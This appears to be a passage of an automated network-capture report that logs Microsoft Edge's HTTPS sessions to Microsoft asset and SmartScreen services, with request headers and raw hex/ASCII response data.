2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 c6 95 ea 57 bd 73 50 18 1d 54 fb 07 d5 da 41 bd 99 aa 6f 53 Data Ascii: u\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{OWsPTAoS
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 65 5d 3f 2f 1b ab ff 79 9a 2b b3 79 5d 62 4f 7c d5 ff 34 22 Data Ascii: Jj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@e]?/y+y]bO\|4"
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 cb e9 d4 75 42 52 43 29 e8 e5 94 bf 82 e4 a6 c8 40 37 67 5f Data Ascii: IdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>uBRC)@7g_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49794	13.107.246.63	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:04 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-29 11:28:05 UTC	556	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:04 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Fri, 22 Nov 2024 21:01:12 GMT ETag: 0x8DD0B38CBCCFA90 x-ms-request-id: 41384699-d01e-0047-7451-42b76c000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241129T112804Z-174f7845968ljs8phC1EWRe6en0000000zmg000000007w4a Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-29 11:28:05 UTC	15828	IN	Data Raw: 1f 8b 08 08 18 f1 40 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: @gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 c1 d0 1d 5d d0 58 b3 51 22 09 e8 37 c0 b1 dc 86 43 a9 41 db Data Ascii: e\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:]XQ"7CA
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b 70 5a 19 73 3e 85 d2 c6 f8 80 22 71 cd f5 40 34 cd c4 ce 27 Data Ascii: kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|crkXpZs>"q@4'
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc 9c d4 76 22 35 66 3f 5d d9 fb 8e 7d 65 84 fb 4f 5b 04 9b a8 Data Ascii: _CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;v"5f?]}eO[
2024-11-29 11:28:05 UTC	5227	IN	Data Raw: 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e 26 d2 d8 ca 80 2c 56 f9 34 27 86 21 28 e6 0e 92 0c 4e 75 b7 Data Ascii: a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.&,V4'!(Nu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49795	40.118.171.167	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:04 UTC	723	OUT	POST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 746 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5Ijoid2h3Y05xcWxhenlTVGlPaEtWM3FJdz09IiwgImhhc2giOiJUb1FkRTVrRkVhTT0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "636976985063396749.rel.v2" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-29 11:28:04 UTC	746	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-29 11:28:04 UTC	248	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:04 GMT Content-Type: application/octet-stream Content-Length: 57 Connection: close Server: Kestrel ETag: "638343870221005468" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-29 11:28:04 UTC	57	IN	Data Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d Data Ascii: 9murmur3,MhZ8\<&LiH[?m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49796	40.118.171.167	443	3284	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:04 UTC	698	OUT	POST /api/browser/edge/data/settings/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 725 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiT3hucVJiNElJeWtCMVhielA5OHRUdz09IiwgImhhc2giOiJuODYyQjVNaGgyWT0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "2.0-0" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-29 11:28:04 UTC	725	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-29 11:28:05 UTC	302	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:05 GMT Content-Type: application/octet-stream Content-Length: 130439 Connection: close Server: Kestrel ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-29 11:28:05 UTC	16082	IN	Data Raw: 7b 0d 0a 20 20 22 67 65 6f 69 64 4d 61 70 73 22 3a 20 7b 0d 0a 20 20 20 20 22 61 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 75 73 74 72 61 6c 69 61 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 63 68 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 77 69 74 7a 65 72 6c 61 6e 64 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 65 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 70 65 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 66 66 6c 34 22 3a 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 74 65 64 73 74 61 74 65 73 31 2e 73 73 2e 77 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 75 73 2f 22 2c 0d 0a Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 30 39 63 34 37 36 32 37 62 63 35 33 33 62 35 39 32 34 61 30 35 35 61 30 34 62 63 34 63 33 33 65 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 39 2e 35 38 33 34 34 30 31 37 37 34 34 37 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 36 33 34 65 62 32 30 64 62 35 30 38 65 33 61 33 31 62 36 31 34 38 31 61 32 35 31 62 66 39 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 33 33 37 30 36 38 35 39 32 37 38 32 37 33 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: { "key": "09c47627bc533b5924a055a04bc4c33e", "value": 9.58344017744784 }, { "key": "e634eb20db508e3a31b61481a251bf93", "value": -0.337068592782735
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 30 37 37 37 34 37 33 33 30 39 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 31 32 62 62 65 66 63 30 35 64 35 31 34 32 65 37 65 62 36 38 36 66 61 64 38 64 65 61 39 32 31 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 35 37 31 37 37 35 33 31 31 38 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 65 35 66 62 38 64 66 31 32 35 61 34 37 32 31 64 31 64 66 33 32 38 62 63 36 66 32 64 64 65 61 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a Data Ascii: 07774733095 }, { "key": "12bbefc05d5142e7eb686fad8dea9211", "value": -1.05717753118094 }, { "key": "ce5fb8df125a4721d1df328bc6f2ddea", "value":
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 20 2d 31 2e 39 30 31 33 34 36 37 39 37 33 36 34 32 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 66 32 33 35 64 63 66 36 62 34 32 39 62 61 34 31 36 64 63 65 37 34 64 34 62 36 66 62 63 34 37 62 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 31 2e 32 36 30 31 38 31 31 38 35 36 30 38 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 38 66 31 37 64 37 34 30 33 61 63 35 66 66 32 38 39 36 61 37 31 33 61 37 31 37 35 65 64 31 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 Data Ascii: -1.9013467973642 }, { "key": "f235dcf6b429ba416dce74d4b6fbc47b", "value": 1.26018118560884 }, { "key": "c8f17d7403ac5ff2896a713a7175ed19", "va
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 36 62 64 32 65 65 33 36 63 30 33 66 36 66 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 35 2e 38 35 39 38 36 34 33 39 33 34 36 35 37 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 66 64 32 61 66 36 30 63 38 35 30 31 39 33 31 63 62 39 63 37 33 36 62 35 61 64 37 34 66 36 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 33 2e 39 35 36 39 39 35 33 35 33 36 34 30 30 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 32 63 38 34 38 35 34 38 64 34 36 30 63 Data Ascii: 6bd2ee36c03f6f", "value": 5.85986439346576 }, { "key": "efd2af60c8501931cb9c736b5ad74f65", "value": 3.95699535364003 }, { "key": "2c848548d460c
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 20 22 6b 65 79 22 3a 20 22 65 31 36 38 36 30 37 38 64 31 62 36 30 64 33 35 31 64 61 35 61 38 37 35 34 33 61 32 61 36 36 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 37 2e 35 30 36 36 35 35 32 34 32 36 32 35 35 31 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 33 61 33 34 31 37 66 35 66 32 30 61 30 33 61 39 38 39 37 33 36 38 39 38 38 37 66 62 37 32 61 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 37 34 39 32 32 35 31 37 36 34 32 37 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 Data Ascii: "key": "e1686078d1b60d351da5a87543a2a663", "value": 7.50665524262551 }, { "key": "3a3417f5f20a03a98973689887fb72a2", "value": -1.74922517642794 }, {
2024-11-29 11:28:05 UTC	16384	IN	Data Raw: 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 62 30 64 61 32 37 35 35 32 30 39 31 38 65 32 33 64 64 36 31 35 65 32 61 37 34 37 35 32 38 66 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 39 37 36 31 34 30 37 39 32 39 31 35 33 37 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 66 61 62 31 62 61 38 63 36 37 63 37 63 38 33 38 64 62 39 38 64 36 36 36 66 30 32 61 31 33 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 31 31 37 38 37 35 38 36 30 34 35 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a Data Ascii: { "key": "b0da275520918e23dd615e2a747528f1", "value": -0.976140792915373 }, { "key": "cfab1ba8c67c7c838db98d666f02a132", "value": -1.11787586045094 },
